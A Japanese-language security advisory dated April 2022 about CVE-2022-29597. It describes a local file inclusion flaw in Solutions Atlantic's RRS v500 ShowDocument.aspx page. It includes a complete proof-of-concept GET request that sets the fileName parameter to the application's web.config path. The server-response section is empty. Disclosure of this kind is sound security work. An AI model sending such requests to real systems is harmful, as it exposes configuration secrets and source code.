
RRS v500 アプリケーションには、ローカルファイルインクルージョン (LFI) の脆弱性があります。
Solutions Atlantic の RRS v500 アプリケーションには、ローカルファイルインクルージョン (LFI) の脆弱性が存在します。認証されたユーザーは誰でも、/RRSWeb/maint/ShowDocument/ShowDocument.aspx ページへのリクエスト内で内部システムファイルを参照することができます。サーバーは、要求された内部システムファイルの内容を正常に応答として返します。この機能により、攻撃者は基盤となるファイルシステムから機密データやファイルを抽出したり、システムの内部動作に関する知識を得たり、アプリケーションのソースコードにアクセスしたりできる可能性があります。
Mitre URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29597
NIST URL: https://nvd.nist.gov/vuln/detail/CVE-2022-29597
影響を受ける URL:
/RRSWeb/maint/ShowDocument/ShowDocument.aspxRRS サイトから PDF を開いたりダウンロードしたりする際に、fileName パラメータを含むリクエストが影響を受ける URL に対して行われます。このパラメータは、web.config などの内部システムパスを含むように変更される可能性があります。サーバーはその後、要求されたファイルを配信します。
web.config への内部パスを含む GET リクエスト:
GET /RRSWeb/maint/ShowDocument/ShowDocument.aspx?fileName=C:\\Program%20Files\\Solutions%20Atlantic\\RRS\\RRSWeb\\web.config HTTP/1.1
Host: <REDACTED>
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://<REDACTED>/RRSweb/default.aspx
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: _ga=<REDACTED>; ASP.NET_SessionId=<REDACTED>
Connection: Keep-Alive
サーバーの応答:

2022年4月